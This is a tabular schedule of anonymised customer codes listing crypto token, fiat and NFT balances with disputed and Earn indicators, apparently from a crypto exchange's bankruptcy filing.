| 07376973 | | BTC[0], SOL[0], USD[0.00] | | |
| 07376974 | | DOGE[0], GRT[0], KSHIB[0], MATIC[0], SHIB[435789.74343281], TRX[0], USD[0.00] | | |
| 07376975 | | BRZ[1], CUSDT[2], DOGE[149.31003257], GRT[1], TRX[8.54594161], USD[0.01] | | |
| 07376976 | | BRZ[2], CUSDT[1], DOGE[17165.95185955], ETH[1.08279183], ETHW[1.08233697], GRT[1.00498957], KSHIB[22603.47590518], LINK[3.13734898], SHIB[23709510.59816137], TRX[1506.83843007], USD[0.00] | Yes | |
| 07376977 | | DOGE[188.30395195], USD[0.00] | | |
| 07376978 | | BRZ[.00000007], DOGE[2.04968290], USD[0.00] | | |
| 07376979 | | DOGE[26.51266895], USD[0.00] | | |
| 07376980 | | BAT[1], BRZ[1], CUSDT[9], DOGE[37885.1589101], GRT[1], TRX[9], USD[0.71], USDT[0] | | |
| 07376981 | | ETH[.0055301], ETHW[.0055301], USD[0.00] | | |
| 07376982 | | BAT[0], DOGE[5], GRT[0], LINK[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07376983 | | USD[10.00] | | |
| 07376984 | | USD[0.00] | | |
| 07376985 | | BAT[63.06180177], CUSDT[709.95257331], DOGE[1], USD[0.00] | | |
| 07376986 | | TRX[1], USD[8.69] | | |
| 07376987 | | BRZ[1], USD[0.01], USDT[1] | | |
| 07376988 | | BAT[1], DOGE[87794.3255254], GRT[2], SUSHI[1], TRX[1], USD[0.00] | | |
| 07376989 | | USD[0.00] | | |
| 07376991 | | USD[10.00] | | |
| 07376992 | | BAT[1.0165555], BRZ[2], BTC[0.00000013], CUSDT[3], DOGE[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07376993 | | USD[10.00] | | |
| 07376994 | | USD[0.00] | | |
| 07376995 | | BAT[1], CUSDT[8], ETH[.75697696], ETHW[.75697696], SOL[12.95500461], TRX[2], USD[0.00], USDT[1] | | |
| 07376996 | | BTC[0], CUSDT[5], DOGE[0], TRX[0], USD[0.00] | | |
| 07376997 | | DOGE[678.24615459], USD[35.00] | | |
| 07376998 | | NFT (516990876434688199/The Founder #144)[1], USD[0.00] | | |
| 07377000 | | USD[10.00] | | |
| 07377001 | | CUSDT[1], DOGE[5959.67750546], SHIB[10203549.71770938], TRX[4], USD[0.00] | | |
| 07377002 | | BAT[1.00984346], BRZ[1], CUSDT[2], ETH[0.00000037], ETHW[0.00000037], LTC[0], SHIB[1472722.62299578], SUSHI[3.81977047], USD[0.00] | Yes | |
| 07377003 | | BRZ[1], CUSDT[6], TRX[929.84696944], USD[0.00] | Yes | |
| 07377005 | | USD[10.00] | | |
| 07377006 | | DOGE[2085.78109798], USD[10.00] | | |
| 07377007 | | DOGE[302.15660574], USD[0.00] | | |
| 07377009 | | DOGE[42.7589384], USD[0.00] | | |
| 07377010 | | BAT[6.60825784], BRZ[5.07525492], CUSDT[20], DOGE[5], ETH[0], GRT[5.23262769], LTC[0], MATIC[0], SHIB[1.00000004], TRX[29.38309908], UNI[1.1030161], USD[0.00], USDT[2.16043544] | Yes | |
| 07377011 | | USD[10.00] | | |
| 07377012 | | USD[0.00] | | |
| 07377013 | Contingent, Disputed | DOGE[141.65006173], USD[0.00] | | |
| 07377014 | | USD[10.00] | | |
| 07377015 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377016 | | USD[2.40] | | |
| 07377017 | | CUSDT[3], DOGE[3718.91617653], TRX[3], USD[0.00] | | |
| 07377018 | | DOGE[28.50540597], USD[10.00] | | |
| 07377019 | | BTC[0], DOGE[0], UNI[0.00000887], USD[0.00] | | |
| 07377020 | | BAT[0], CUSDT[15.5], DOGE[3.65573484], ETH[0], EUR[0.00], GRT[0.00019556], KSHIB[0], MATIC[0.00015334], SHIB[0], SUSHI[.00572781], TRX[0.00216031], USD[0.06] | Yes | |
| 07377021 | | CUSDT[2], ETH[0], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07377022 | | USD[10.00] | | |
| 07377023 | | BTC[0], CUSDT[5], DOGE[11.81286564], USD[0.00] | | |
| 07377024 | | BTC[.02292087], ETH[.23866038], ETHW[.23845982], SHIB[2000685.25838148], SOL[11.6394955], USD[0.00] | Yes | |
| 07377025 | | USD[10.00] | | |
| 07377026 | | DOGE[2.86956517], ETH[.00089037], ETHW[.00089037], SOL[.21777139], USD[0.00] | | |
| 07377027 | | BAT[123.8589963], BRZ[2], BTC[.00558058], CUSDT[12], DOGE[11026.28342358], ETH[.21838165], ETHW[.21816474], MATIC[72.16791737], SHIB[16940014.07644111], SOL[15.81071326], TRX[3593.1213845], UNI[2.62743930], USD[0.00], USDT[0], YFI[.02237744] | Yes | |
| 07377028 | | BRZ[3], CUSDT[14], DOGE[0], ETH[0], PAXG[.07426654], SHIB[2], SOL[4.5671002], SUSHI[0], TRX[1], UNI[0], USD[0.01], YFI[.00810017] | | |
| 07377029 | | CUSDT[3], DOGE[7135.47641435], TRX[1], USD[0.00] | Yes | |
| 07377031 | | BRZ[2], CUSDT[4], DOGE[3], SHIB[1], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07377032 | | BRZ[1], DOGE[1912.08250249], MATIC[64.68270867], SHIB[2730630.95806026], TRX[1], USD[0.00] | Yes | |
| 07377033 | | CUSDT[1], DOGE[0], TRX[250.91273487], USD[0.21], USDT[1] | | |
| 07377034 | | BRZ[2], CUSDT[7], DOGE[1731.72061133], KSHIB[1914.6958535], SHIB[1920715.99675533], TRX[2], USD[11.87] | Yes | |
| 07377035 | | USD[10.00] | | |
| 07377036 | | CUSDT[1], DOGE[.97660517], USD[41.90] | | |
| 07377037 | | USD[10.00] | | |
| 07377038 | | TRX[7.49249711], USD[0.00] | | |
| 07377039 | | BAT[1], BRZ[1], CUSDT[6], DOGE[1], SHIB[40201043.64913864], TRX[2], USD[0.00] | | |
| 07377040 | | BTC[0], DOGE[0], ETH[0], SHIB[5566.38081451], TRX[0], USD[0.00] | Yes | |
| 07377041 | | USD[100.00] | | |
| 07377042 | | ETH[0], USD[0.00], USDT[0.00000001] | | |
| 07377043 | | USD[0.00] | | |
| 07377044 | | USD[10.00] | | |
| 07377045 | | CUSDT[1], DOGE[469.64257858], USD[0.00] | | |
| 07377046 | | USD[10.00] | | |
| 07377047 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07377048 | | USD[0.03], USDT[0] | Yes | |
| 07377049 | | DOGE[22.06131326], USD[0.00] | Yes | |
| 07377050 | | CUSDT[2], DOGE[947.45139313], USD[0.00] | | |
| 07377051 | | USD[10.00] | | |
| 07377052 | | DOGE[31.87484172], USD[0.33] | | |
| 07377053 | | TRX[1], USD[0.00] | | |
| 07377054 | | BF_POINT[200], BRZ[1], CUSDT[6], DOGE[222.86508911], TRX[177.20604249], USD[0.01] | Yes | |
| 07377055 | | BTC[.00175793], DOGE[4925.03838377], SHIB[2868617.32644865], TRX[4], USD[0.00] | | |
| 07377056 | | BTC[0], CUSDT[1], ETH[0], USD[0.00], USDT[0.00004929] | | |
| 07377057 | | BAT[1.01004667], BRZ[4], DOGE[3], ETHW[.22989569], GRT[782.67659196], SHIB[17], TRX[6], USD[0.01] | Yes | |
| 07377058 | | BRZ[1], CUSDT[2], DOGE[0], USD[0.00] | Yes | |
| 07377059 | | BRZ[2], BTC[.00918216], CUSDT[17], DOGE[317.21121468], LINK[12.28056037], SHIB[2], SUSHI[7.42094136], TRX[4], UNI[7.04422698], USD[0.00], YFI[.00433879] | Yes | |
| 07377060 | | BAT[1], BCH[0], BRZ[7.30106012], BTC[0], CUSDT[11], DOGE[1], ETH[0], GRT[41.88527350], LINK[0], LTC[0], SOL[73.87140434], TRX[5], USD[0.00], USDT[2.08601722] | Yes | |
| 07377062 | | USD[10.00] | | |
| 07377063 | | CUSDT[1], DOGE[527.48996246], USD[10.00] | | |
| 07377064 | | USD[0.01], USDT[0] | | |
| 07377065 | | USD[0.00] | | |
| 07377066 | | USD[0.01] | | |
| 07377067 | | BRZ[4], BTC[.00000003], CUSDT[7], DOGE[2.00865068], GRT[1], TRX[5.15711008], USD[0.09], USDT[.02883171] | | |
| 07377068 | | BTC[.00006089], CUSDT[15], DOGE[0], USD[0.01] | Yes | |
| 07377069 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07377070 | | CUSDT[1], DOGE[159.41084724], TRX[1], USD[0.00] | | |
| 07377071 | | CUSDT[4], USD[0.00] | | |
| 07377074 | | BAT[1], BRZ[2], CUSDT[18], DOGE[7], ETH[.00036848], ETHW[.00036848], GRT[1], LINK[5.95681415], LTC[1.4834942], TRX[4], USD[10.66], USDT[1] | | |
| 07377075 | | BTC[0], CUSDT[1], DOGE[0], SHIB[1], TRX[2], USD[1.13] | | |
| 07377076 | | USD[10.00] | | |
| 07377077 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377078 | | USD[0.12] | | |
| 07377079 | | DOGE[0], USD[0.00] | | |
| 07377080 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07377081 | | DOGE[15.34240818], USD[0.00] | | |
| 07377082 | | DOGE[1184.30142065], GRT[41.36818949], USD[10.00] | | |
| 07377083 | | USD[10.00] | | |
| 07377085 | | DOGE[170.96849033], USD[0.00] | | |
| 07377086 | | USD[10.00] | | |
| 07377087 | | USD[10.00] | | |
| 07377089 | | BTC[.00141279], CUSDT[3], DOGE[600.42533263], ETH[.00842862], ETHW[.00842862], SHIB[556544.96883348], TRX[1], USD[0.07] | | |
| 07377090 | | BRZ[2], BTC[0], CUSDT[2], DOGE[1], TRX[2], USD[0.00], USDT[41.79476299] | | |
| 07377091 | | USD[0.00] | | |
| 07377092 | | USD[10.00] | | |
| 07377093 | | DOGE[1133.1139656], USD[0.00] | | |
| 07377094 | | BTC[0], USD[0.00] | | |
| 07377095 | | CUSDT[2], TRX[3], USD[0.00] | | |
| 07377096 | | BAT[219.44153167], BRZ[4], CUSDT[5], DOGE[2], TRX[3410.25673871], USD[0.01] | Yes | |
| 07377097 | | BTC[.00312717], CUSDT[2], DAI[40.27289662], ETH[0], LTC[.00000179], USD[0.00] | Yes | |
| 07377098 | | USD[10.00] | | |
| 07377099 | | UNI[.24711656], USD[0.00] | | |
| 07377100 | | BRZ[2], CUSDT[4], DOGE[1], NFT (289243846478458676/Coachella x FTX Weekend 1 #22928)[1], TRX[2], USD[0.50] | | |
| 07377101 | | USD[0.00] | | |
| 07377103 | | USD[10.00] | | |
| 07377104 | | BRZ[1], USD[0.00] | | |
| 07377105 | | BAT[1], BCH[.00817293], CUSDT[3], DOGE[.49478714], TRX[1], USD[0.00], USDT[1] | | |
| 07377106 | | USD[10.00] | | |
| 07377107 | | DOGE[2], LTC[.04567476], USD[0.00] | | |
| 07377108 | | CUSDT[2], DOGE[60.11595517], TRX[489.26688032], USD[0.00] | | |
| 07377109 | | USD[10.00] | | |
| 07377110 | | CUSDT[1], DOGE[1141.01194382], TRX[1], USD[0.01] | | |
| 07377111 | | BTC[.0022537], CUSDT[5], DOGE[128.96702347], ETH[.05023108], ETHW[.05023108], USD[0.00] | | |
| 07377112 | | USD[10.00] | | |
| 07377113 | | BAT[1], USD[0.11] | | |
| 07377114 | | CUSDT[1], DOGE[.00008543], USD[0.01] | | |
| 07377115 | | USD[8.99] | | |
| 07377116 | | USD[10.00] | | |
| 07377117 | | BRZ[2], DOGE[2], TRX[1], USD[0.01], USDT[1.0884234] | Yes | |
| 07377118 | | CUSDT[1], DOGE[1334.72832331], USD[0.00] | | |
| 07377119 | | BRZ[2], CUSDT[7], DOGE[6910.70245527], SOL[42.54106815], TRX[2], USD[0.00] | Yes | |
| 07377120 | | USD[10.00] | | |
| 07377121 | | BTC[.00002017], ETH[.00502225], ETHW[.00502225], USD[0.00] | | |
| 07377123 | | USD[10.00] | | |
| 07377124 | | USD[10.00] | | |
| 07377125 | | CUSDT[2], DOGE[213.11983327], USD[0.30] | | |
| 07377126 | | TRX[183.43023341], USD[0.00] | | |
| 07377127 | | BTC[.00049088], CUSDT[6], DOGE[0.18145431], ETH[.00748386], ETHW[.0073881], SHIB[129568.93024564], TRX[32.89605858], USD[0.00] | Yes | |
| 07377128 | | DOGE[1523.92434964], GRT[1], USD[75.00] | | |
| 07377129 | | BAT[1], BRZ[2], CUSDT[6], DOGE[3], USD[0.01], USDT[0] | | |
| 07377130 | | CUSDT[9], DOGE[2], MATIC[28.37723653], SHIB[12312778.75254595], TRX[3], USD[3.88] | Yes | |
| 07377131 | | BAT[1], BRZ[56.21802311], BTC[.01689215], CUSDT[4], DOGE[5260.31060906], ETH[.41741374], ETHW[.41741374], SHIB[1360170.68019225], TRX[4], USD[2.08] | | |
| 07377132 | | DOGE[1], USD[0.00] | | |
| 07377133 | | DOGE[108.94935911], USD[2.00] | | |
| 07377134 | | DOGE[152.29000107], USD[0.00] | Yes | |
| 07377135 | | DOGE[13553.3273283], TRX[1], USD[0.00] | | |
| 07377136 | | USD[0.00] | | |
| 07377137 | | CUSDT[1], DOGE[1441.00813993], USD[0.00] | | |
| 07377138 | | USD[10.00] | | |
| 07377139 | | DOGE[119.16460142], GRT[3.00014466], LINK[1.00030131], MATIC[1.00961351], SHIB[72304586.59280583], SOL[149.62738794], TRX[7], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377140 | | CUSDT[2], USD[43.39] | | |
| 07377141 | | USD[10.00] | | |
| 07377142 | | BTC[0], DOGE[0], ETH[0], USDT[0.06996660] | | |
| 07377143 | | ETH[.00210314], ETHW[.00210314], TRX[1], USD[0.00], USDT[0] | | |
| 07377145 | | USD[10.00] | | |
| 07377146 | | USD[10.00] | | |
| 07377148 | | USD[10.00] | | |
| 07377149 | | USD[0.00] | | |
| 07377150 | | USD[10.00] | | |
| 07377151 | | CUSDT[5], USD[0.00] | Yes | |
| 07377152 | | BTC[.00427848], CUSDT[1], DOGE[1935.709849], USD[0.00] | | |
| 07377153 | | ETHW[2.06292917], USD[3917.05], USDT[0] | Yes | |
| 07377154 | | BF_POINT[100], USD[0.00], USDT[0.00000001] | | |
| 07377155 | | USD[10.00] | | |
| 07377156 | | BRZ[2], DOGE[12170.08164788], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07377158 | | CUSDT[2], DOGE[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07377160 | | BTC[.00000063], USD[0.00] | | |
| 07377161 | | BTC[.0481152], ETH[.67555677], ETHW[.67555677], SHIB[28600000], SOL[10.84], USD[4.04], USDT[0.00052576] | | |
| 07377162 | | USD[10.00] | | |
| 07377163 | | DOGE[1.00009446], USD[0.00] | | |
| 07377164 | | USD[10.00] | | |
| 07377166 | | BTC[.00296417], CUSDT[3], DOGE[691.39314529], ETH[.06212287], ETHW[.06212287], SHIB[1486988.84758364], USD[0.00], USDT[0.00003205] | | |
| 07377170 | | USD[2.13] | | |
| 07377171 | | USD[0.01] | | |
| 07377172 | | UNI[.47532553], USD[0.00] | | |
| 07377173 | | USD[10.00] | | |
| 07377174 | | USD[0.00] | | |
| 07377176 | | BTC[.00722113], CUSDT[1], TRX[1], USD[0.00] | | |
| 07377177 | | USD[10.00] | | |
| 07377178 | | ETHW[7.135], SOL[.0636], USD[6.60], USDT[3.3728666] | | |
| 07377179 | | CUSDT[3], DOGE[40.57405336], USD[0.00] | | |
| 07377181 | | CUSDT[1], DOGE[.48695019], TRX[1], USD[16.78] | | |
| 07377183 | | USD[10.00] | | |
| 07377185 | | USD[10.00] | | |
| 07377186 | | DOGE[165.79244232], USD[0.00] | | |
| 07377187 | | DOGE[130.34064266], USD[0.00] | | |
| 07377188 | | DOGE[1], TRX[2.00536892], USD[0.00] | Yes | |
| 07377189 | | USD[10.00] | | |
| 07377190 | | USD[10.00] | | |
| 07377191 | | BAT[1], GRT[1], TRX[4], USD[0.00], USDT[3] | | |
| 07377192 | | USD[10.00] | | |
| 07377193 | | SHIB[12589.11146874], USD[0.00] | | |
| 07377194 | | BTC[0.00003249], USD[4.84] | | |
| 07377195 | | CUSDT[5], TRX[3], USD[0.00] | | |
| 07377196 | | USD[121.49] | Yes | |
| 07377198 | | USD[10.00] | | |
| 07377199 | | BTC[0], CUSDT[3], ETHW[.06687913], NFT [435008135840667487/Aku World: Dream #66][1], NFT [442040781765102017/NFT BZL 2021 #2][1], NFT [442510964603410404/You in, Miami? #66][1], NFT [514566969973700299/Aku World: Miami #4][1], NFT [519721829320235841/FTX - Off The Grid Miami #2014][1], SHIB[1], SUSHI[.62737803], USD[223.36] | Yes | |
| 07377200 | | DOGE[0.00004688], GRT[5.06435172], TRX[1], USD[0.01] | | |
| 07377201 | | CUSDT[31], GRT[1.00000013], SOL[1.62860022], TRX[7], USD[0.00] | | |
| 07377203 | | BRZ[2], CUSDT[7], SOL[3.53623291], TRX[1868.84837124], USD[0.00] | | |
| 07377205 | | ETH[.00000454], ETHW[.49690899], LINK[.00002069], MATIC[.0087472], TRX[.0140061], UNI[.00003009], USD[6486.96] | Yes | |
| 07377206 | | BRZ[1], BTC[.01712813], CUSDT[13], DOGE[3685.00113594], ETH[0.38973491], ETHW[0.38973491], EUR[82.21], LINK[2.03407874], LTC[.05369501], SOL[1.12451377], TRX[6], USD[10.68] | | |
| 07377207 | | USD[0.00] | | |
| 07377208 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07377210 | | USD[10.00] | | |
| 07377211 | | USD[10.00] | | |
| 07377212 | | DOGE[424.20524102], USD[1.49] | | |
| 07377213 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377214 | | BTC[.00017539], DOGE[1.9999965], USD[0.00] | | |
| 07377215 | | USD[36.98] | | |
| 07377216 | | BAT[1349.90779171], BRZ[305.75815956], BTC[.03925512], CUSDT[1], DOGE[75.79438667], PAXG[4.99607458], TRX[4481.93938884], USD[0.35], USDT[1] | | |
| 07377217 | | CUSDT[1], DOGE[1536.56038907], USD[0.00] | | |
| 07377218 | | BAT[1.01294612], BF_POINT[300], BRZ[5.07811831], CUSDT[21], DOGE[0], ETHW[.2], GRT[321.80989009], NFT (400979180244219693/Australia Ticket Stub #764)[1], NFT (420091084056145865/Red Panda #4407)[1], NFT (465276728902853872/Good Boy #5050)[1], NFT (504609792431636636/Humpty Dumpty #42)[1], NFT (512562957540143498/You in, Miami? #6)[1], NFT (513879061611211670/Concordian #3727)[1], NFT (573824592313065234/Enigma Crystal #518)[1], SHIB[4232108.90538671], SOL[.00589546], TRX[20.63078899], USD[2697.52], USDT[0.00000002] | Yes | |
| 07377219 | | USD[10.00] | | |
| 07377220 | | BAT[0], BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LTC[0], SGD[0.00], SOL[0], TRX[0.00011732], USD[0.00], USDT[0], YFI[0] | | |
| 07377221 | | CUSDT[3], TRX[3], USD[31.36] | | |
| 07377222 | | BRZ[1], DOGE[661.95879227], SHIB[673945.27564361], USD[0.00] | | |
| 07377223 | | USD[10.00] | | |
| 07377224 | | BRZ[1], CUSDT[8], DOGE[7659.6266913], MATIC[24.65481143], NFT (301697837635623128/Caelum Series #56)[1], NFT (521246701175144329/Caelum Series #55)[1], SHIB[4669454.21089254], TRX[1027.9999667], USD[38.84] | | |
| 07377225 | | BTC[.00017738], USD[0.00] | | |
| 07377226 | | USD[10.00] | | |
| 07377228 | | CUSDT[1], DOGE[.87699275], USD[23.93] | | |
| 07377230 | | SHIB[830315.44440064], USD[0.00] | | |
| 07377231 | | NFT (319354496490057471/The Hill by FTX #991)[1], NFT (348534751127618437/Saudi Arabia Ticket Stub #918)[1] | Yes | |
| 07377233 | | CUSDT[1], USD[60.01] | | |
| 07377234 | | USD[10.00] | | |
| 07377235 | | BTC[0], CUSDT[1], USD[0.00], USDT[0] | | |
| 07377236 | | BAT[1], BRZ[1], CUSDT[7], DOGE[329.39778629], TRX[1373.34188248], USD[0.00], USDT[1] | | |
| 07377237 | | USD[10.00] | | |
| 07377238 | | USD[0.00], USDT[0] | | |
| 07377239 | | USD[10.00] | | |
| 07377240 | | AVAX[0], BAT[1], BRZ[1], BTC[0], CUSDT[0], DOGE[3], ETH[0], GRT[0], LTC[0], MATIC[0], SHIB[205849.29897692], SOL[0], SUSHI[0], TRX[5], UNI[0.00105110], USD[0.00], USDT[0] | Yes | |
| 07377241 | | SOL[0], USD[0.00], USDT[0] | Yes | |
| 07377242 | | USD[0.00] | | |
| 07377243 | | CUSDT[2], DOGE[249.4913631], USD[0.01] | | |
| 07377245 | | USD[10.00] | | |
| 07377246 | | SOL[.00000008], USD[0.00], USDT[0] | | |
| 07377248 | | DOGE[163.72711013], USD[0.00] | | |
| 07377249 | | BTC[.00021483], DOGE[286.44743588], USD[0.00] | Yes | |
| 07377250 | | BTC[.00975608], DOGE[1141.34182921], USD[0.00] | | |
| 07377251 | | USD[10.00] | | |
| 07377252 | | CUSDT[138.53257651], USD[0.00] | | |
| 07377255 | | BRZ[1], CUSDT[3], DOGE[6958.74760808], SHIB[7308863.26647243], TRX[1], USD[0.76] | Yes | |
| 07377257 | | TRX[1], USD[0.01] | | |
| 07377258 | | USD[10.00] | | |
| 07377259 | | DOGE[1732.49032231], TRX[2060.18246211], USD[0.00] | | |
| 07377260 | | SUSHI[.66141133], USD[0.00] | | |
| 07377261 | | USD[10.00] | | |
| 07377262 | | DOGE[2767.83800772], USD[10.00] | | |
| 07377264 | | USD[10.00] | | |
| 07377265 | | DOGE[18.33884033], USD[0.00] | | |
| 07377266 | | DOGE[1009.15056392], TRX[1], USD[10.00] | | |
| 07377267 | | BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[1.30915585], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[0] | | |
| 07377268 | | BRZ[5], CUSDT[6], TRX[3], USD[0.00] | | |
| 07377269 | | LINK[3.7701116], SOL[.13934878], USD[56.09], USDT[0] | | |
| 07377270 | | BAT[4.42272783], BRZ[14.2572348], BTC[.00000006], CUSDT[20], DOGE[32.28971926], GRT[9.75971182], SHIB[4], SUSHI[2.22143011], TRX[22.774845], USD[74.50], USDT[11.03643475] | Yes | |
| 07377271 | | CUSDT[1], DOGE[0], TRX[0], USD[0.01], USDT[1] | | |
| 07377272 | | CUSDT[1], DOGE[146.68076466], TRX[1], USD[0.40] | | |
| 07377273 | | BCH[.00000056], CUSDT[3], DOGE[3.00259735], ETH[0], TRX[288.66794035], USD[0.01] | | |
| 07377274 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], EUR[1.23], GBP[0.00], GRT[.00379312], USD[0.00] | | |
| 07377275 | | CUSDT[3.8573374], TRX[16038.35163554], USD[0.00] | Yes | |
| 07377276 | | DOGE[1], GRT[.00779495], USD[10.00] | | |
| 07377278 | | CUSDT[1], DOGE[1], USD[0.01], USDT[0] | Yes | |
| 07377279 | | DOGE[342.31319021], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377280 | | USD[0.01], USDT[0] | | |
| 07377281 | | CUSDT[1], DOGE[.00001809], ETH[0], ETHW[0], USD[0.00] | | |
| 07377282 | | BTC[.00021473], USD[0.00] | | |
| 07377283 | | USD[10.00] | | |
| 07377284 | | BRZ[1], CUSDT[2], DOGE[4264.49110664], GRT[182.46834825], SHIB[1], TRX[3], USD[1613.74] | Yes | |
| 07377285 | | USD[10.00] | | |
| 07377286 | | USD[10.00] | | |
| 07377287 | | USD[10.00] | | |
| 07377288 | | BAT[2], BRZ[1], CUSDT[1], DOGE[52142.76807813], GRT[1], SOL[1], TRX[3], USD[0.00], USDT[1] | | |
| 07377289 | | USD[10.00] | | |
| 07377290 | | USD[10.00] | | |
| 07377291 | | USD[10.00] | | |
| 07377292 | | SHIB[606911.71363133], USD[0.00], USDT[0] | Yes | |
| 07377293 | | USD[0.01] | | |
| 07377295 | | DOGE[142.8677763], USD[0.00] | | |
| 07377296 | | CUSDT[1], USD[0.00] | | |
| 07377297 | | CUSDT[14], USD[0.01] | Yes | |
| 07377298 | | DOGE[123.15101072], USD[0.00] | | |
| 07377299 | | USD[10.00] | | |
| 07377300 | | USD[10.00] | | |
| 07377302 | | USD[10.00] | | |
| 07377303 | | USD[0.00] | | |
| 07377304 | | USD[10.00] | | |
| 07377307 | | DOGE[.00000663], USD[0.00] | Yes | |
| 07377308 | Contingent, Disputed | SUSHI[3], USD[6.28], USDT[.02720936] | | |
| 07377309 | | CUSDT[1], DOGE[562.67960349], USD[0.01] | Yes | |
| 07377310 | | BRZ[1], CUSDT[1], DOGE[.01332542], GRT[1], TRX[1], USD[0.00] | | |
| 07377311 | | DOGE[2694.04905041], USD[492.10] | Yes | |
| 07377312 | | DOGE[9957.16], USD[0.46] | | |
| 07377313 | | CUSDT[1], DOGE[1033.60808145], TRX[1], USD[8.90] | | |
| 07377314 | | GRT[1], USD[0.86] | | |
| 07377315 | | USD[10.00] | | |
| 07377316 | | USD[10.00] | | |
| 07377317 | | ETH[.00340692], ETHW[.00340692], USD[0.00] | | |
| 07377321 | | AVAX[1.05631651], BRZ[0], DOGE[231.23079586], GRT[1.00367791], KSHIB[1364.71635053], SHIB[1690695.94952935], SOL[19.99305744], SUSHI[23.07674211], TRX[2785.12484588], USD[0.01], USDT[0] | Yes | |
| 07377322 | | BCH[.04157752], BTC[.00155434], CUSDT[3], DOGE[1017.99574805], LINK[.52716821], LTC[.07225588], USD[0.00], YFI[.00026301] | | |
| 07377323 | | DOGE[122.37754107], USD[0.00] | | |
| 07377324 | | BRZ[5], CUSDT[5], GRT[1], TRX[1], USD[8.91] | | |
| 07377325 | | DOGE[22.9126], USD[0.06] | | |
| 07377327 | | USD[10.00] | | |
| 07377328 | | BTC[.00025924], EUR[0.61], USD[8.94] | | |
| 07377329 | | BRZ[1], USD[0.01] | | |
| 07377330 | | BRZ[1], CUSDT[13], DOGE[7417.49551842], ETH[6.06021277], ETHW[6.05779004], GRT[507.41933569], LINK[101.37786078], SHIB[13129071.84084743], SOL[31.5918288], SUSHI[40.53502289], TRX[1874.11225764], USD[0.85] | Yes | |
| 07377332 | | USD[10.00] | | |
| 07377333 | | USD[10.00] | | |
| 07377334 | | USD[10.00] | | |
| 07377335 | | CUSDT[2], DOGE[88.04302024], ETH[.00540561], ETHW[.00533721], USD[19.22] | Yes | |
| 07377336 | | BTC[0], USD[3.59] | | |
| 07377337 | | DOGE[48.10532603], TRX[3], USD[463.50] | | |
| 07377340 | | USD[10.00] | | |
| 07377341 | | USD[0.00], USDT[9.94208615] | | |
| 07377343 | | BCH[0], DOGE[22.06066502], UNI[0], USD[0.00] | | |
| 07377344 | | USD[10.00] | | |
| 07377346 | | USD[10.00] | | |
| 07377347 | | USD[0.00] | | |
| 07377348 | | USD[0.01] | | |
| 07377349 | | USD[10.00] | | |
| 07377350 | | DOGE[.71433426], GRT[1], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377351 | | DOGE[.70271408], USD[0.00] | | |
| 07377352 | | DOGE[1], USD[25.33] | | |
| 07377353 | | USD[10.00] | | |
| 07377354 | | BRZ[0], DOGE[121.25687427], TRX[3], USD[2.20] | | |
| 07377355 | | BTC[0], DOGE[168.97155635], USD[0.00], USDT[0] | Yes | |
| 07377356 | | CUSDT[4], DOGE[1749.60953708], TRX[2], USD[0.00] | Yes | |
| 07377357 | | BTC[.00077015], CUSDT[2], DOGE[26.37714743], ETH[0.00408564], ETHW[0.00403092], USD[0.00] | Yes | |
| 07377359 | | BRZ[1], CUSDT[3], USD[0.00], USDT[0.00099765] | | |
| 07377360 | | USD[10.00] | | |
| 07377361 | | DOGE[.00004639], USD[0.00] | | |
| 07377363 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07377364 | | USD[10.00] | | |
| 07377367 | | CUSDT[1100.64264920], DOGE[2014.55100585], TRX[1414.53234720], USD[0.00] | | |
| 07377368 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07377370 | | USD[0.06] | | |
| 07377371 | | USD[10.00] | | |
| 07377373 | | BAT[22.49850688], CUSDT[1], TRX[1], USD[0.01] | | |
| 07377374 | | AUD[0.00], BCH[0], BRZ[0], BTC[0], CAD[0.00], EUR[4.26], GBP[0.00], LTC[0], PAXG[0], SGD[0.00], SOL[0], USD[0.00] | | |
| 07377375 | | CUSDT[1], USD[0.00] | Yes | |
| 07377376 | | USD[10.00] | | |
| 07377377 | | DOGE[139.36668433], USD[0.00] | | |
| 07377378 | | CUSDT[8], DOGE[261.24512972], TRX[1], USD[0.00] | | |
| 07377379 | | USD[10.00] | | |
| 07377380 | | CUSDT[2], DOGE[54.77409645], TRX[253.59238482], USD[0.00] | Yes | |
| 07377381 | | USD[10.00] | | |
| 07377382 | | USD[10.00] | | |
| 07377383 | | KSHIB[0], SHIB[3410.59291338], USD[0.00] | | |
